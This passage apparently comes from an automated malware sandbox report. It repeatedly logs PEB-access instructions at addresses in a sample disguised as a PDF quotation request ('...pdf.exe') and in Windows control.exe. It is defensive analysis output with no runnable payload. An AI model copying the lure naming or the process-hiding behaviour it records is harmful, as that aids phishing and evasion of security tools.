          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h]2_2_00A98ED6
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h]2_2_009D76E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]2_2_009FA61C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]2_2_009FA61C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h]2_2_00A7FE3F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]2_2_009CC600
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]2_2_009CC600
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]2_2_009CC600
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F8E00 mov eax, dword ptr fs:[00000030h]2_2_009F8E00
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81608 mov eax, dword ptr fs:[00000030h]2_2_00A81608
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h]2_2_009CE620
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]2_2_00A8AE44
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]2_2_00A8AE44
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D766D mov eax, dword ptr fs:[00000030h]2_2_009D766D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8794 mov eax, dword ptr fs:[00000030h]2_2_009D8794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]2_2_00A47794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]2_2_00A47794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]2_2_00A47794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A037F5 mov eax, dword ptr fs:[00000030h]2_2_00A037F5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EF716 mov eax, dword ptr fs:[00000030h]2_2_009EF716
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]2_2_009FA70E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]2_2_009FA70E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]2_2_00A9070D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]2_2_00A9070D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h]2_2_009FE730
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]2_2_009C4F2E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]2_2_009C4F2E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]2_2_00A5FF10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]2_2_00A5FF10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h]2_2_00A98F6A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h]2_2_009DEF40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DFF60 mov eax, dword ptr fs:[00000030h]2_2_009DFF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B746D mov eax, dword ptr fs:[00000030h]7_2_047B746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h]7_2_047CA44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h]7_2_04868CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h]7_2_047CBC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]7_2_04816CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]7_2_04816CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]7_2_04816CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048514FB mov eax, dword ptr fs:[00000030h]7_2_048514FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]7_2_0486740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]7_2_0486740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]7_2_0486740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]7_2_0482C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]7_2_0482C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A849B mov eax, dword ptr fs:[00000030h]7_2_047A849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]7_2_047BC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]7_2_047BC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]7_2_048605AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]7_2_048605AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h]7_2_047B7D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h]7_2_047D3D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]7_2_047C4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]7_2_047C4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]7_2_047C4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h]7_2_0479AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h]7_2_04848DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h]7_2_04868D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h]7_2_0481A537
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h]7_2_0485E539
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813540 mov eax, dword ptr fs:[00000030h]7_2_04813540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]7_2_047C1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]7_2_047C1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]7_2_047C1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h]7_2_047C35A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]7_2_047CFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]7_2_047CFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h]7_2_0482FE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A766D mov eax, dword ptr fs:[00000030h]7_2_047A766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]7_2_04860EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]7_2_04860EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]7_2_04860EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h]7_2_048146A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h]7_2_0484FEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h]7_2_04868ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h]7_2_0479E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]7_2_047CA61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]7_2_047CA61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]7_2_0479C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]7_2_0479C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]7_2_0479C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h]7_2_047C8E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851608 mov eax, dword ptr fs:[00000030h]7_2_04851608
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h]7_2_047A76E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h]7_2_047C16E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h]7_2_047C36CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h]7_2_047D8EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h]7_2_0484FE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]7_2_0485AE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]7_2_0485AE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]7_2_04817794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]7_2_04817794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]7_2_04817794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h]7_2_047AFF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h]7_2_047AEF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h]7_2_047CE730
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]7_2_04794F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]7_2_04794F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h]7_2_047BF716
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]7_2_047CA70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]7_2_047CA70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h]7_2_047D37F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]7_2_0486070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]7_2_0486070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]7_2_0482FF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]7_2_0482FF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h]7_2_04868F6A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h]7_2_047A8794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]7_2_04813884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]7_2_04813884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]7_2_047B0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]7_2_047B0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]7_2_04864015
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]7_2_04864015
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047958EC mov eax, dword ptr fs:[00000030h]7_2_047958EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]7_2_04817016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]7_2_04817016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]7_2_04817016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]7_2_047940E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]7_2_047940E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]7_2_047940E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h]7_2_047CF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]7_2_047CF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]7_2_047CF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h]7_2_047D90AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
